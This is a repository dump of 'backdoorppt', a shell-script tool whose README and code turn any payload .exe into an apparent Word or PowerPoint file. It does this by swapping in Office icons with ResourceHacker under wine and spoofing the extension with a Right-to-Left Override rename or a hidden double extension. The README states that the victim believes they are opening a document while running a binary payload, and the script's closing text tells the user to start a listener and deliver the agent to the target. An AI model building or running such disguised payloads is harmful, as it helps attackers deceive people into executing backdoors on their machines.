├── README.md
├── backdoorppt.sh
├── bin
    ├── .backdoorppt-logo.png
    ├── logo.png
    └── reshacker_setup.exe
├── icons
    ├── Microsoft-Excel.ico
    ├── Microsoft-Word-2016.ico
    ├── Microsost-Word-2013.ico
    ├── Modern-Word.ico
    ├── OWA-icon.ico
    ├── PowerPoint-blue.ico
    ├── PowerPoint-orange.ico
    └── Powerpoint-green.ico
├── output
    └── .set
└── settings


/README.md:
--------------------------------------------------------------------------------
 1 | [![Version](https://img.shields.io/badge/backdoorppt-1.7-brightgreen.svg?maxAge=259200)]()
 2 | [![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
 3 | [![Build](https://img.shields.io/badge/Supported_OS-kali,Ubuntu,Mint-blue.svg)]()
 4 | 
 5 | 
 6 | 
 7 | # backdoorppt - 'Office spoof extensions tool'
 8 | 
 9 |     Version release: v1.7-Stable
10 |     Author: pedro ubuntu  [ r00t-3xp10it ]
11 |     Distros Supported: Linux Kali, Ubuntu, Mint
12 |     Suspicious-Shell-Activity© (SSA) RedTeam develop @2017
13 | 
14 | ![backdoorppt](http://i.cubeupload.com/2JJ2IA.png)
15 | 
16 | <br />
17 | 
18 | ## Transform your payload.exe into one fake word doc (.ppt)
19 | 
20 |     Simple script that allow users to add a ms-word icon to one
21 |     existing executable.exe (using resource-hacker as backend appl)
22 |     and a ruby one-liner command that will hidde the .exe extension
23 |     and add the word doc .ppt extension to the end of the file name.
24 | 
25 | 
26 | ## Spoof extension methods
27 | 
28 |     backdoorppt tool uses 2 diferent extension spoof methods:
29 |     'Right to Left Override' & 'Hide Extensions for Known File Types'
30 |     Edit the 'settings' file to chose what method should be used..
31 | 
32 |     cd backdoorppt && nano settings
33 | ![backdoorppt](http://i.cubeupload.com/ldKWDd.png)
34 | 
35 | ## Dependencies (backend applications required)
36 | 
37 |     xterm, wine, ruby, ResourceHacker(wine)
38 | 
39 |     'backdoorppt script will work on wine 32 or 64 bits'
40 |     'it also installs ResourceHacker under .../.wine/Program Files/.. directorys'
41 | 
42 | ## Tool Limitations
43 | 
44 |     1º - backdoorppt only supports windows binarys to be transformed (.exe -> .ppt)
45 |     2º - backdoorppt requires ResourceHacker installed (wine) to change the icons
46 |     3º - backdoorppt present you 6 available diferent icons (.ico) to chose from
47 |     4º - backdoorppt does not build real ms-word doc files, but it will transform
48 |          your payload.exe to look like one word doc file (social engineering).
49 | 
50 | 
51 | <br /><br />
52 | 
53 | ## Backdoorppt working (Kali distros)
54 | ![backdoorppt](http://i.cubeupload.com/ueWu5R.png)
55 | 
56 | ## transformed files on-target system (windows)
57 | ![backdoorppt](http://i.cubeupload.com/Hkv0jp.jpeg)
58 | 
59 | <br /><br />
60 | 
61 | ## Final notes
62 | 
63 |     Target user thinks they are opening a word document file,
64 |     but in fact they are executing one binary payload insted.
65 | 
66 | <br />
67 | 
68 | 
69 | 
70 | ## Video tutorials:
71 | 
72 | backdoorppt: https://www.youtube.com/watch?v=k4UJW4p1E3w&t=1s
73 | 
74 | <br />
75 | 
76 | ### Special thanks:
77 | **@Damon Mohammadbagher** | **Article: goo.gl/hKHesk**
78 | 
79 | 


--------------------------------------------------------------------------------
/backdoorppt.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/sh
  2 | ###
  3 | # backdoorppt - A MS Office spoof extensions tool
  4 | # Author: pedr0 Ubuntu [r00t-3xp10it] version: 1.7
  5 | # Suspicious-Shell-Activity (SSA) RedTeam develop @2017
  6 | # codename: ghost-in-a-shell
  7 | #
  8 | # [ TOOL DESCRIPTION ]
  9 | # This tool Supports wine 32 or 64 bits installations
 10 | # Available with 6 icons to change (backdoorppt/icons)
 11 | # Available 2 diferent name transformations methods (ruby or bash)
 12 | # 1 - Right to Left Override (nameexe.ppt) <-- ruby
 13 | # 2 - Hide Extensions for Known File Types (name.ppt.exe) <-- bash
 14 | ###
 15 | 
 16 | 
 17 | 
 18 | #
 19 | # Colorise shell Script output leters
 20 | #
 21 | Colors() {
 22 | Escape="\033";
 23 |   white="${Escape}[0m";
 24 |   RedF="${Escape}[31m";
 25 |   GreenF="${Escape}[32m";
 26 |   YellowF="${Escape}[33m";
 27 |   BlueF="${Escape}[34m";
 28 |   CyanF="${Escape}[36m";
 29 | Reset="${Escape}[0m";
 30 | }
 31 | 
 32 | 
 33 | 
 34 | 
 35 | #
 36 | # variable declarations
 37 | #
 38 | VeR="1.7" # script version
 39 | ArCh=`arch` # store attackers arch
 40 | IPATH=`pwd` # store script full path
 41 | HoME=`echo ~` # store home full path
 42 | CnA="ghost-in-a-shell" # script codename
 43 | HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
 44 | #
 45 | # Read options (configurations) from settings file ..
 46 | #
 47 | tRan=`cat $IPATH/settings | egrep -m 1 "BASH_TRANSFORMATION" | cut -d '=' -f2` > /dev/null 2>&1
 48 | ByPa=`cat $IPATH/settings | egrep -m 1 "RESOURCEHACKER_BYPASS" | cut -d '=' -f2` > /dev/null 2>&1
 49 | 
 50 | 
 51 | 
 52 | #
 53 | # configuring correct arch
 54 | #
 55 | if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
 56 |   dEd="x86"
 57 |   arch="wine"
 58 |   PgFi="Program Files"
 59 | elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then
 60 |   dEd="x64"
 61 |   arch="wine64"
 62 |   PgFi="Program Files (x86)" # default value  
 63 | else
 64 |   dEd="x64"
 65 |   arch="wine64"
 66 |   PgFi="Program Files"
 67 | fi
 68 | #
 69 | # Resource hacker install path (local)
 70 | #
 71 | RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"
 72 | 
 73 | 
 74 | 
 75 | #
 76 | # Tool banner
 77 | #
 78 | cat << !
 79 | 
 80 |     +-+-+-+-+-+-+-+-+-+-+-+-+---+
 81 |     |b|a|c|k|d|o|o|r|p|p|t|:|$VeR|
 82 |     +-+-+-+-+-+-+-+-+-+-+-+-+---+
 83 |     'Office spoof extensions tool'
 84 |     Credits: Damon Mohammadbagher
 85 | 
 86 | !
 87 | 
 88 | 
 89 | Colors;
 90 | #
 91 | # check for dependencies
 92 | #
 93 | echo ${BlueF}[☆]${white}" Checking backend applications .. "${Reset};
 94 | sleep 1
 95 | if ! [ "$tRan" = "YES" ]; then
 96 | apc=`which ruby`
 97 | if [ "$?" != "0" ]; then
 98 | echo ""
 99 | echo ${RedF}[x]${white}" Ruby interpreter     : ${RedF}not found! "${Reset};
100 | echo ${RedF}[x]${white}" This funtion requires ruby to work! "${Reset};
101 | sleep 1
102 | exit
103 | else
104 | echo ${BlueF}[☆]${white}" Ruby installation   : ${GreenF}found! "${Reset};
105 | sleep 1
106 | fi
107 | fi
108 | 
109 | # search for wine installation
110 | apc=`which $arch`
111 | if [ "$?" != "0" ]; then
112 | echo ""
113 | echo ${RedF}[x]${white}" Wine installation    : ${RedF}not found! "${Reset};
114 | sleep 1
115 | echo ${RedF}[x]${white}" This script requires wine to work! "${Reset};
116 | echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
117 | echo ""
118 | sudo apt-get install $arch
119 | echo ""
120 | exit
121 | else
122 | echo ${BlueF}[☆]${white}" Wine installation   : ${GreenF}found! "${Reset};
123 | sleep 1
124 | fi
125 | 
126 | # search for zenity installation
127 | apc=`which zenity`
128 | if [ "$?" != "0" ]; then
129 | echo ""
130 | echo ${RedF}[x]${white}" Zenity installation  : ${RedF}not found! "${Reset};
131 | sleep 1
132 | echo ${RedF}[x]${white}" This script requires Zenity to work! "${Reset};
133 | echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
134 | echo ""
135 | sudo apt-get install zenity
136 | echo ""
137 | exit
138 | else
139 | echo ${BlueF}[☆]${white}" Zenity installation : ${GreenF}found! "${Reset};
140 | sleep 1
141 | fi
142 | 
143 | # search for xterm installation
144 | apc=`which xterm`
145 | if [ "$?" != "0" ]; then
146 | echo ""
147 | echo ${RedF}[x]${white}" Xterm installation   : ${RedF}not found! "${Reset};
148 | sleep 1
149 | echo ${RedF}[x]${white}" This script requires xterm to work! "${Reset};
150 | echo ${RedF}[x]${white}" Please wait, installing missing dependencies .."${Reset};
151 | echo ""
152 | sudo apt-get install xterm
153 | echo ""
154 | exit
155 | else
156 | echo ${BlueF}[☆]${white}" Xterm installation  : ${GreenF}found! "${Reset};
157 | sleep 1
158 | fi
159 | 
160 | #
161 | # Bypass Resource hacker funtion (replace icon)
162 | # OR search if drive_c correct folder exists
163 | #
164 | if [ "$ByPa" = "NO" ]; then
165 |   if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then
166 |     echo ${BlueF}[☆]${white}" Wine $PgFi  : ${GreenF}found! "${Reset};
167 |     sleep 1
168 |   else
169 |     echo ${RedF}[x]${white}" Wine $PgFi   : ${RedF}not found! "${Reset};
170 |     echo ${RedF}[x]${white}" $HoME/.wine/drive_c/$PgFi "${Reset};
171 |     sleep 1
172 |     echo ${RedF}[x]${white}" Please wait, running winecfg! "${Reset};
173 |     winecfg > /dev/null 2>&1
174 |     echo ""
175 |     # List directorys just to be sure ..
176 |     echo ${RedF}"Listing drive_c directorys: "${Reset};
177 |     ls $HoME/.wine/drive_c
178 |     echo ""
179 |     sleep 1
180 |     exit
181 |   fi
182 | fi
183 | 
184 | 
185 | 
186 | #
187 | # START OF SCRIPT FUNTIONS ..
188 | #
189 | rUn=$(zenity --question --title="☠ BackdoorPPt ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
190 | if [ "$?" -eq "0" ]; then
191 | # orginal payload full-path variable
192 | UpL=$(zenity --title "☠ PAYLOAD TO BE TRANSFORMED (.exe) ☠" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1
193 | # icon replacement variable
194 | if [ "$ByPa" = "NO" ]; then
195 | IcOn=$(zenity --list --title "☠ ICON REPLACEMENT  ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "Microsoft-Word-2016.ico" FALSE "Microsost-Word-2013.ico" FALSE "Powerpoint-green.ico" FALSE "Powerpoint-blue.ico" FALSE "Powerpoint-orange.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 350 --height 310) > /dev/null 2>&1
196 |   #
197 |   # User have decided to input is own icon.ico file ..
198 |   # So, were is it ? (your icon.ico full path) ..
199 |   #
200 |   if [ "$IcOn" = "Input your own icon" ]; then
201 |     ImR=$(zenity --title "☠ ICON REPLACEMENT ☠" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
202 |     PaTh="$ImR"
203 |   else
204 |     PaTh="$IPATH/icons/$IcOn"
205 |   fi
206 | fi
207 | #
208 | # Input payload output name ..
209 | # And check if inputed program its one .exe binarie ..
210 | #
211 | MiP=$(zenity --entry --title "☠ PAYLOAD FINAL NAME ☠" --text "example: curriculum" --width 300) > /dev/null 2>&1
212 | che=`echo $UpL | cut -d '.' -f2`
213 | if ! [ "$che" = "exe" ]; then
214 |   echo ""
215 |   echo ${RedF}[x]${YellowF}ABORT: Only [${RedF}.exe${YellowF}] binaries are accepted .. ${Reset};
216 |   sleep 2
217 |   exit
218 | fi
219 | 
220 |   #
221 |   # If RH BYPASS its not active (settings file)
222 |   #
223 |   if [ "$ByPa" = "NO" ]; then
224 |     #
225 |     # Config WINE windows version (if not supported) ..
226 |     #
227 |     if ! [ "$HkLm" = "Microsoft Windows 7" ]; then
228 |       echo ${RedF}[x]${white}" Wine system detected: $HkLm "${Reset};
229 |       echo ${RedF}[x]${white}" FakeImageExploiter requires: windows 7 version .."${Reset};
230 |       echo ${YellowF}[☆]" Starting winecfg, Please sellect required version .."${Reset};
231 |       sleep 1
232 |       winecfg > /dev/null 2>&1
233 |     fi
234 | 
235 |     #
236 |     # Check for resource hacker installation (wine)
237 |     #
238 |     if [ -f "$RhI" ]; then
239 |       echo ${BlueF}[☆]${white}" ResourceHacker.exe  : ${GreenF}found! "${Reset};
240 |       sleep 1
241 |     else
242 |       echo ${RedF}[x]${white}" ResourceHacker.exe   : ${RedF} not found! "${Reset};
243 |       sleep 1
244 | cat << !
245 | 
246 |     Installing ResourceHacker under .wine directorys... 
247 |     Version:windows7 Arch:$ArCh Path:drive_c/$PgFi
248 |     $HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe
249 | 
250 | !
251 |       sleep 3
252 |       xterm -T "BackdoorPPt" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
253 |       echo ${YellowF}[⊶]${white}" Please wait, restarting tool! "${Reset};
254 |       echo ${YellowF}[⊶]${white}" For proper ResourceHacker.exe Instalation! "${Reset};
255 |       sleep 2
256 |       exit
257 |     fi
258 | 
259 |     #
260 |     # wine command to call resourcehacker and add an MS-WORD.ico to the backdoor
261 |     #
262 |     echo ${YellowF}[☆]" Working on backdoor agent .."${Reset};
263 |     sleep 1
264 |     echo ${BlueF}[☆]${white}" Transforming backdoor agent    : ${GreenF}done .. "${Reset};
265 |     $arch "$RhI" -open "$UpL" -save "$IPATH/output/backdoor.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,
266 |     echo ${BlueF}[☆]${white}" Change backdoor agent icons    : ${GreenF}done .. "${Reset};
267 |     sleep 1
268 | 
269 |   else
270 | 
271 |     # Copy binary to output folder to be manually transformed ..
272 |     cp $UpL $IPATH/output/backdoor.exe > /dev/null 2>&1
273 |     echo ${YellowF}[☆]${white}" Manually change icon.ico sellected .."${Reset};
274 |     echo ${YellowF}[☆]${white}" Use your favorite editor to change the icon of [backdoor.exe]"${Reset};
275 |     echo ${YellowF}[☠]" When finish, press any key to Continue .."${Reset};
276 |     # Waiting for you to finish (read op) ..
277 |     read op
278 | 
279 |   fi
280 | 
281 | 
282 |     #
283 |     # insert .ppt hidden extension
284 |     #
285 |     echo ${BlueF}[☆]${white}" Adding agent hidden extensions : ${GreenF}done .. "${Reset};
286 |     # chose ruby or bash transformation
287 |     if [ "$tRan" = "YES" ]; then
288 |       mv $IPATH/output/backdoor.exe  $IPATH/output/$MiP.ppt.exe > /dev/null 2>&1
289 |     else
290 |       mv $IPATH/output/backdoor.exe  $IPATH/output/backdoor_ppt.exe > /dev/null 2>&1
291 |     fi
292 | 
293 |   sleep 1
294 |   cd $IPATH/output
295 |   #
296 |   # rename backdoor output name (only RTLO method)
297 |   #
298 |   echo ${BlueF}[☆]${white}" Word doc builder (output-name) : ${GreenF}done .. "${Reset};
299 |   if ! [ "$tRan" = "YES" ]; then
300 |     echo "$MiP" > outname.txt
301 |     #
302 |     # Ruby one-liner command to READ the contents of 'outname.txt' file,
303 |     # That contains the agent output name, then stores it into 'fil' ruby local
304 |     # variable to be able to rename the agent output name using ruby syntax ..
305 |     #
306 |     ruby -e 'fil = File.read("outname.txt") and File.rename("backdoor_ppt.exe", "#{fil}\xe2\x80\xaetpp.exe")'
307 |     rm outname.txt > /dev/null 2>&1
308 |   fi
309 |   sleep 1
310 |   cd $IPATH
311 | 
312 | 
313 | #
314 | # Display final outputs to user
315 | #
316 | echo ${YellowF}[☆]" Task over, Writing reports .."${Reset};
317 | sleep 2
318 | if [ "$IcOn" = "Input your own icon" ]; then
319 | IcOn="$PaTh"
320 | fi
321 | 
322 |   #
323 |   # IF 'hide know file types extension' method its active
324 |   #
325 |   if [ "$tRan" = "YES" ]; then
326 |     echo ""
327 |     echo ${RedF}"    Icon select : $IcOn"${Reset};
328 |     echo ${RedF}"    Final file  : $IPATH/output/$MiP.ppt.exe"${Reset};
329 | cat << !
330 | 
331 |     Your backdoor agent its now transformed into one fake
332 |     word doc (ppt) remmenber that .exe extensions will not
333 |     be 'visible' under windows systems, because the system
334 |     default behavior its: NOT show hidden extensions ..
335 | 
336 |     We are now ready to start a handler (listener) and
337 |     deliver the transformed agent to the target machine.
338 | 
339 | !
340 | 
341 |   else
342 | 
343 |     #
344 |     # IF 'RTLO' method its active
345 |     #
346 |     echo ""
347 |     dre="exe.ppt"
348 |     echo ${RedF}"    Icon select : $IcOn"${Reset};
349 |     echo ${RedF}"    Final file  : $IPATH/output/$MiP$dre"${Reset};
350 | cat << !
351 | 
352 |     Your backdoor agent its now transformed into one fake
353 |     word doc (ppt) using RTLO spoofing extensions method.
354 | 
355 |     We are now ready to start a handler (listener) and
356 |     deliver the transformed agent to the target machine.
357 | 
358 | !
359 |   fi
360 | 
361 | 
362 | #
363 | # The user dont want to run the tool (aborted switch) ..
364 | #
365 | else
366 |   echo ${RedF}[x]${white}" Aborting all tasks  : ${GreenF}done!"${Reset};
367 |   sleep 2
368 |     echo ""
369 |     echo ${white}Codename${RedF}::${white}$CnA ${Reset};
370 |     echo ${white}Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
371 |     echo ${white}backdoorppt${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
372 | exit
373 | fi
374 | #
375 | # exit tool, and good nigth ..
376 | #
377 | echo ${white}Codename${RedF}::${white}$CnA ${Reset};
378 | echo ${white}Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
379 | echo ${white}backdoorppt${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
380 | exit
381 | 


--------------------------------------------------------------------------------
/bin/.backdoorppt-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/.backdoorppt-logo.png


--------------------------------------------------------------------------------
/bin/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/logo.png


--------------------------------------------------------------------------------
/bin/reshacker_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/bin/reshacker_setup.exe


--------------------------------------------------------------------------------
/icons/Microsoft-Excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsoft-Excel.ico


--------------------------------------------------------------------------------
/icons/Microsoft-Word-2016.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsoft-Word-2016.ico


--------------------------------------------------------------------------------
/icons/Microsost-Word-2013.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Microsost-Word-2013.ico


--------------------------------------------------------------------------------
/icons/Modern-Word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Modern-Word.ico


--------------------------------------------------------------------------------
/icons/OWA-icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/OWA-icon.ico


--------------------------------------------------------------------------------
/icons/PowerPoint-blue.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/PowerPoint-blue.ico


--------------------------------------------------------------------------------
/icons/PowerPoint-orange.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/PowerPoint-orange.ico


--------------------------------------------------------------------------------
/icons/Powerpoint-green.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/backdoorppt/d0e7f91e2b499fd210fa4ca17e4a1c0fdfcd5a95/icons/Powerpoint-green.ico


--------------------------------------------------------------------------------
/output/.set:
--------------------------------------------------------------------------------
1 | .set
2 | 
3 | 


--------------------------------------------------------------------------------
/settings:
--------------------------------------------------------------------------------
 1 | ##############################################################################
 2 | #                                                                            #
 3 | #    The following config file will allow you to customize settings within   #
 4 | #    BACKDOORPPT tool, The lines that Do not have comment code ("#") are     #
 5 | #    the fields you want to toy with. There are additional options, read     #
 6 | #    the comments For additional config settings.                            #
 7 | #                                                                            #
 8 | #    CHANGING THIS SETTINGS WILL AFFECT 'backdoorppt.sh' WAY OF WORKING      #
 9 | #                                                                            #
10 | ##############################################################################
11 | 
12 | 
13 | 
14 | ### Spoof extension method to use?
15 | #
16 | # RUBY - RTLO Right to Left Override
17 | # This trick uses Right to Left unicode to reverse the last six characters so that
18 | # the extension is spoofed, for example a notes.exe file can be renamed to notesexe.txt
19 | # Although the file extension clearly shows as .txt in Explorer the Windows operating
20 | # system still recognizes the file as an application. example of 1º method: notesexe.txt
21 | #
22 | # BASH - Hide Extensions for Known File Types
23 | # There is a setting in Folder Options where you can hide the file extension so that
24 | # only the filename is visible in Explorer while the extension is hidden. The problem
25 | # with this setting is the default option is set to hide and a less careful user can be
26 | # tricked when there is a double extension. An example of 2º method: notes.txt.exe
27 | #
28 | # backdoorppt by default uses 'Right to Left Override' (ruby)
29 | # but it can be config to use 'Hide Extensions for Known File Types' (bash)
30 | # Accepted values are: YES (bash) or NO (ruby)
31 | ----------------------
32 | BASH_TRANSFORMATION=NO
33 | ----------------------
34 | 
35 | 
36 | 
37 | 
38 | ### BYPASS RESOURCEHACKER SOFTWARE WORK
39 | # This option bypasses the use of resourcehacker.exe to chance the icons
40 | # of the payload to be transformed (you will have to change the icons manualy)
41 | # because backdooppt will only chance the payload extensions if this option is active.
42 | # Accepted values are: YES or NO
43 | ------------------------
44 | RESOURCEHACKER_BYPASS=NO
45 | ------------------------
46 | 
47 | 
48 | 
49 | _EOF
50 | 
51 | 


--------------------------------------------------------------------------------